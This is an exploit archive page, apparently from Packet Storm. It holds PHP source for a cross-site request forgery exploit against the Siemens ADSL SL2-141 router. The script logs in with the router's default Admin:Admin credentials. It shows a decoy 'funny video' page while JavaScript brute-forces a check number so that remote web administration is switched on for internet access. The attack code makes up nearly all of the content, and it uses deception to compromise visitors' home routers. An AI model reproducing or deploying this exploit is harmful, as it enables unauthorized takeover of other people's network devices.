exploit the possibilities

Siemens ADSL SL2-141 XSRF Exploit

Siemens ADSL SL2-141 XSRF Exploit
Posted Jan 26, 2009
Authored by spdr

Siemens ADSL SL2-141 router cross site request forgery exploit.

tags | exploit, csrf
MD5 | e47c58873511e980f6ffae9aba0db6f3

Siemens ADSL SL2-141 XSRF Exploit

Change Mirror Download
<?php

/*

================================================
|| Siemens ADSL SL2-141 (Router) CSRF Exploit ||
================================================

- Successful attacks will allow remote access to the router over the internet.
- Will Bruteforce the random security number, could possibly be calculated...
- Uses default login, could use a dictionary too.
- PoC only, there are much more effective ways of doing this ;-)

========================================================================
[+] Visit us at http://www.binaryvision.org.il/ for more information [+]
========================================================================

*/

$ip = (getenv(HTTP_X_FORWARDED_FOR))? getenv(HTTP_X_FORWARDED_FOR): getenv(REMOTE_ADDR); // local computers can use the remote address to login (!).
echo "<img src='http://Admin:Admin@$ip/'></img>"; // Uses the default login to auth (Admin:Admin), could use a dictionary instead.

// Just some stuff to keep the user busy, aka Rickroll
$mystr="<html><head><title>Unbelivable movie</title></head><center><script>function siera() {var bullshit='<center><h1>Possibly the funniest video on the web</h1><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\" width=\"800\" height=\"600\" id=\"movie\"> <param name=\"movie\" value=\"http://llnw.static.cbslocal.com/Themes/CBS/_resources/swf/vindex.swf\" /> <param name=\"quality\" value=\"high\" /> <param name=\"bgcolor\" value=\"#003366\" /> <embed src=\"http://llnw.static.cbslocal.com/Themes/CBS/_resources/swf/vindex.swf\" quality=\"high\" bgcolor=\"#ffffff\" width=\"800\" height=\"600\" name=\"mymoviename\" align=\"\" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"> </embed> </object><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>';
document.write(bullshit);

// "Random number" bruteforce ... too lazy to write js :-)
var buff = '';
for(i=1;i<=11000;i++) { buff+=\"<img src='http://$ip/accessremote.cgi?checkNum=\"+i+\"&remoteservice=pppoe_8_48_1&enblremoteWeb=1&remotewebPort=8080'></img>\"; }
document.write(buff);
}
</script><body onload='siera()'></body>";

echo $mystr; // Throw it all on the html page
?>



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    15 Files
  • 10
    Dec 10th
    30 Files
  • 11
    Dec 11th
    8 Files
  • 12
    Dec 12th
    20 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close